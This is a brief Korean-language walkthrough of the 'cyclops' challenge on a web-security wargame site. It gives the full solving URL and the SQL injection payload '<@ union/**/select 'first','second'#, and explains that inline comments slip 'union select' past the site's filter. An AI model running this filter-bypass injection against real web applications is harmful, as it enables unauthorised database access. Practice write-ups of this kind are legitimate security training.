첫 화면이다.
https://modsec.rubiya.kr/chall/cyclops_9d6a565d1cb6c38a06a6b0815344e29e.php?id=%27%3C@%20union/**/select%20%27first%27,%27second%27%23arrow-up-right 에 접속하면 문제가 풀린다.
id에 '<@ union/**/select 'first','second'# 을 넣은 셈이다.
'<@ union/**/select 'first','second'#
union select 가 필터링 되기 때문에 /**/ 를 사용해 우회하였다.
union select
/**/
Last updated 5 years ago
